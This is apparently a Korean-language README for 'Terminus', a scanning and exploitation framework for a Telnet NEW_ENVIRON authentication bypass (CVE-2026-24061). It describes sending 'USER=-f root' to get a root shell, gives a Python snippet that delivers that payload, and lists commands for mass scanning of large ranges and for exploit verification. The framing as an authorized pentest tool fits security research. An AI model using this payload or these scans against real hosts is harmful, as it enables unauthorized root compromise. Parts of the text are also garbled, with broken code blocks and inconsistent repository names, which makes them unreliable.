
AsyncIO 기반 스캐너 및 CVE-2026-24061(Telnet NEW_ENVIRON 인증 우회)용 익스플로잇 프레임워크. 고동시성 탐지, 수동 핑거프린팅, 그리고 인가된 루트 셸 권한 상승 기능을 제공합니다.
CVE-2026-24061 Telnet NEW_ENVIRON 인증 우회 및 권한 상승 취약점을 위한 보안 분석 엔진입니다.

Terminus는 CVE-2026-24061의 승인된 침투 테스트 및 취약점 평가를 위해 설계된 전문 보안 연구 도구입니다. 이 치명적인 취약점은 레거시 Telnet 데몬 구현에 영향을 미치며, 비인증 원격 공격자가 인증을 우회하고 root 수준의 접근 권한을 얻을 수 있게 합니다.
CVE-2026-24061은 RFC 1572(Telnet 환경 옵션)를 지원하는 Telnet 서비스의 원격 코드 실행 취약점입니다. 이 취약점은 NEW_ENVIRON 하위 협상 중 USER 환경 변수의 부적절한 검증을 악용합니다:
USER=john → 비밀번호 요청USER=-f root → 인증 우회, root 셸 부여영향:
영향을 받는 서비스:
192.168.0.0/24, 10.0.0.0/8)--verify): 익스플로잇 증명, uid=0 root 접근 확인Terminus.handshake() - RFC 854 준수 핸드셰이크Terminus.exploit() - CVE-2026-24061 페이로드 전달--exploit 플래그 필요Terminus의 핵심은 프로토콜 처리와 익스플로잇 로직을 명확하게 분리하는 TerminusNegotiator 클래스입니다:```python
from terminus import TerminusNegotiator
negotiator = TerminusNegotiator()
await negotiator.handshake(target="192.168.1.100", port=23)
result = await negotiator.exploit(payload="-f root")
if result.success: print(f"Root shell acquired: {result.evidence['uid']}")
### 엔진 vs. 스크립트 접근 방식
**기존 스크립트** (기존 도구):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell
Terminus 엔진:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report
---
## 설치
### 요구 사항
- **Python 3.10+**
- **지원 플랫폼:**
- Windows 10/11 (PowerShell)
- Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
- 네이티브 Linux (Kali, Parrot, Ubuntu, Debian)
- macOS (Python 3.10+ 포함)
### 빠른 시작 (모든 플랫폼)
#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
# Run setup script
.\setup_env.ps1
# Activate virtual environment
.venv\Scripts\Activate.ps1
# Verify installation
terminus --version
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406
chmod +x setup_env.sh ./setup_env.sh
source venv/bin/activate
terminus --version
#### 수동 설치 (모든 플랫폼)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406
# Create virtual environment
python3 -m venv venv
# Activate (Linux/macOS/WSL)
source venv/bin/activate
# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1
# Install dependencies
pip install -e .
# Verify
terminus --version
telnetlib3 - AsyncIO Telnet 프로토콜 구현rich - 터미널 UI 및 포맷팅 (Windows/Linux에서 ANSI 지원)pydantic - 데이터 검증 및 모델aiofiles - 비동기 파일 I/Ojinja2 - 보고서 템플릿 생성pyyaml - 구성 관리pathlib - 크로스 플랫폼 경로 처리 (내장)참고: 모든 종속성은 순수 Python이거나 크로스 플랫폼 휠을 제공합니다. 플랫폼별 컴파일이 필요하지 않습니다.
더 빠른 명령 입력을 위해 탭 완성을 활성화합니다:
_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc
_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression
테스트해 보세요:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.
---
## 사용법
### 스캔 모드
#### 단일 대상 스캔```bash
terminus scan -t 192.168.1.100
terminus scan -t 192.168.1.0/24
#### 파일 기반 배치 스캔```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500
terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200
### 탐지 모드
#### 수동 탐지 (기본값 - 안전)```bash
terminus scan -t target.com --passive-only
terminus scan -t target.com --aggressive
#### 능동 검증 모드 (익스플로잇 증명)```bash
terminus scan -t 192.168.1.100 --verify
버전 확인:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db
**수동 스캔 (기본값 - 보수적 위험 평가):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Parsing 1 targets...
Found 1 valid targets